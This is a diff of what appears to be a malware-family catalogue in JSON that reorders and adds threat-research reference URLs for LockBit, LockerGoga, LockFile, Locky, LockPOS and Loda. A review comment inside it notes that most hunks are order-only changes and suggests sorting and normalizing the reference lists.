- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://www.glimps.fr/lockbit3-0/",
- "https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign",
- "https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://skyblue.team/posts/hive-recovery-from-lockbit-2.0/",
- "https://unit42.paloaltonetworks.com/lockbit-2-ransomware/",
- "https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions",
- "https://www.seqrite.com/blog/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/",
- "https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
- "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
- "https://medium.com/s2wblog/quick-overview-of-leaked-lockbit-3-0-black-builder-program-880ae511d085",
- "https://www.crowdstrike.com/blog/how-crowdstrike-prevents-volume-shadow-tampering-by-lockbit-ransomware/",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- 
"https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/",
 "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit",
+ "https://chuongdong.com/reverse%20engineering/2022/03/19/LockbitRansomware/",
+ "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/",
+ "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/",
+ "https://www.intrinsec.com/alphv-ransomware-gang-analysis",
+ "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf",
 "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html",
- "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-1-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254354",
- "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
 "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
+ "https://www.cisa.gov/sites/default/files/2023-06/aa23-165a_understanding_TA_LockBit_0.pdf",
+ "https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/",
+ "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
+ 
"https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/",
+ "https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html",
+ "https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/",
+ "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/",
+ "https://asec.ahnlab.com/en/35822/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
 "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://www.lemagit.fr/actualites/252516821/Ransomware-LockBit-30-commence-a-etre-utilise-dans-des-cyberattaques",
+ "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
+ "https://securelist.com/crimeware-report-lockbit-switchsymb/110068/",
+ "https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511",
+ "https://blog.minerva-labs.com/lockbit-3.0-aka-lockbit-black-is-here-with-a-new-icon-new-ransom-note-new-wallpaper-but-less-evasiveness",
+ "https://asec.ahnlab.com/ko/39682/",
+ "https://id-ransomware.blogspot.com/search?q=lockbit",
+ 
"https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets", + "https://ke-la.com/lockbit-2-0-interview-with-russian-osint/", + "https://cluster25.io/2022/07/06/lockbit-3-0-making-the-ransomware-great-again/", + "https://www.connectwise.com/resources/lockbit-profile", + "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://asec.ahnlab.com/en/41450/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://seguranca-informatica.pt/malware-analysis-details-on-lockbit-ransomware/", + "https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions", + "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/", + "https://medium.com/s2wblog/quick-overview-of-leaked-lockbit-3-0-black-builder-program-880ae511d085", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool", + "https://www.netskope.com/blog/netskope-threat-coverage-lockbit", + "https://unit42.paloaltonetworks.com/lockbit-2-ransomware/", + "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", + "https://www.seqrite.com/blog/indian-power-sector-targeted-with-latest-lockbit-3-0-variant/", + 
"https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom", + "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html", + "https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/", + "https://github.com/prodaft/malware-ioc/tree/master/PTI-257", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor", + "https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/", + "https://www.glimps.fr/lockbit3-0/", + "https://amgedwageh.medium.com/lockbit-ransomware-analysis-notes-93a542fc8511", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html", + "https://blog.cyble.com/2021/08/16/a-deep-dive-analysis-of-lockbit-2-0/", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/", + "https://securelist.com/modern-ransomware-groups-ttps/106824/", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", 
"https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/", + "https://github.com/EmissarySpider/ransomware-descendants", + "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-1-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254354", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md", + "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion", + "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-2-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254421", + "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/", + "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities", + "https://www.seqrite.com/blog/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.youtube.com/watch?v=C733AyPzkoc", + "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/", + "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html", + "https://intel471.com/blog/privateloader-malware", + "https://twitter.com/MsftSecIntel/status/1522690116979855360", + "https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware", + "https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + 
"https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/", + "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://skyblue.team/posts/hive-recovery-from-lockbit-2.0/", + "https://blog.lexfo.fr/lockbit-malware.html", + "https://security.packt.com/understanding-lockbit/", + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility", + "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", + "https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/", + "https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/", + "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", "https://securelist.com/new-ransomware-trends-in-2022/106457/", "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022", - "https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/", - "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool", - "https://blog.lexfo.fr/lockbit-malware.html", - 
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/", + "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/", + "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-claims-attack-on-bridgestone-americas/", + "https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign", + "https://analyst1.com/ransomware-diaries-volume-1/", + "https://www.glimps.fr/dcouverte-dune-nouvelle-version-du-ramsomware-lockbit/", + "https://www.ic3.gov/Media/News/2022/220204.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit", + "https://www.mbsd.jp/2021/10/27/assets/images/MBSD_WhitePaper_A-deep-dive-analysis-of-LockBit2.0_Ransomware.pdf", + "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants", "https://blog.cyble.com/2022/07/05/lockbit-3-0-ransomware-group-launches-new-version/", - "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", - "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/", - "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md", - "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-2-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254421", - "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", - "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion" + "https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html", + "https://www.prodaft.com/m/reports/LockBit_Case_Report___TLPWHITE.pdf", + 
"https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf", + "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve", + "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/", + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html", + "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://www.crowdstrike.com/blog/how-crowdstrike-prevents-volume-shadow-tampering-by-lockbit-ransomware/", + "https://www.logpoint.com/en/blog/hunting-lockbit-variations-using-logpoint/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.lemagit.fr/actualites/252516821/Ransomware-LockBit-30-commence-a-etre-utilise-dans-des-cyberattaques", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack" ], "synonyms": [ "ABCD Ransomware" 
@@ -31472,27 +32983,27 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
- "https://blog.talosintelligence.com/lockergoga/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
- "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202",
 "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
- "https://www.abuse.io/lockergoga.txt",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://blog.talosintelligence.com/lockergoga/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
 "https://www.youtube.com/watch?v=o6eEN0mUakM",
+ "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
+ "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
 "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880",
 "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/",
- "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
 "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/",
+ "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/",
 "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
- "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/"
+ "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf",
+ "https://www.abuse.io/lockergoga.txt",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf"
 ],
 "synonyms": [],
 "type": []
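Review bot: Every changed line in this hunk is a `refs` entry that is removed and re-added elsewhere in the same array (27 old lines, 27 new lines, the same set of URLs), so the hunk records a permutation rather than a content change; the LockFile, Locky, LockPOS, LODEINFO, LogPOS, Logtu and LoJax hunks below have the same shape. That looks like a regeneration from a source that does not preserve order, and it buries the few hunks that change something (LokiLocker adds one reference, Loda re-escapes its description) among many no-op lines that a reviewer has to read one by one. If the generator sorted each `refs` array before serializing (e.g. `sorted(set(refs))` if it is Python), regeneration would be idempotent and diffs would show only real additions and removals. Sorting would not catch variant URLs, though: the LockBit refs above add both `...how-to-protect-yourself/` and `...how-to-protect-yourself` (with and without the trailing slash), so a normalization step in the generator is worth considering as well.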
@@ -31505,19 +33016,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile",
- "https://news.sophos.com/en-us/2021/08/23/proxyshell-vulnerabilities-in-microsoft-exchange-what-to-do/",
 "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/",
- "https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/",
 "https://twitter.com/VirITeXplorer/status/1428750497872232459",
- "https://www.csoonline.com/article/3631517/lockfile-ransomware-uses-intermittent-encryption-to-evade-detection.html",
- "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
 "https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/",
 "https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html",
+ "https://news.sophos.com/en-us/2021/08/23/proxyshell-vulnerabilities-in-microsoft-exchange-what-to-do/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows",
+ "https://www.csoonline.com/article/3631517/lockfile-ransomware-uses-intermittent-encryption-to-evade-detection.html",
+ "https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/",
 "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/"
+ "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
+ "https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
 ],
 "synonyms": [],
 "type": []
@@ -31530,29 +33041,29 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky",
- "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/",
- "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
 "https://dissectingmalwa.re/picking-locky.html",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/",
- "https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/",
- "https://vixra.org/pdf/2002.0183v1.pdf",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/",
- "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html",
- "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html",
 "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://vixra.org/pdf/2002.0183v1.pdf",
+ "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/",
 "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html",
- "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/"
+ "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html",
+ "https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/",
+ "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/"
 ],
 "synonyms": [],
 "type": []
@@ -31590,8 +33101,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos",
 "https://www.cyberbit.com/new-lockpos-malware-injection-technique/",
- "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html"
+ "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html",
+ "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/"
 ],
 "synonyms": [],
 "type": []
@@ -31600,20 +33111,20 @@
 "value": "LockPOS"
 },
 {
- "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.",
+ "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda",
- "https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html",
- "https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html",
- "https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html",
- "https://www.silentpush.com/blog/more-lodarat-infrastructure-targeting-bangladesh-uncovered",
- "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
 "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
 "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware",
- "https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/",
+ "https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html",
+ "https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/",
 "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/",
- "https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/"
+ "https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/",
+ "https://www.silentpush.com/blog/more-lodarat-infrastructure-targeting-bangladesh-uncovered",
+ "https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html"
 ],
 "synonyms": [
 "LodaRAT",
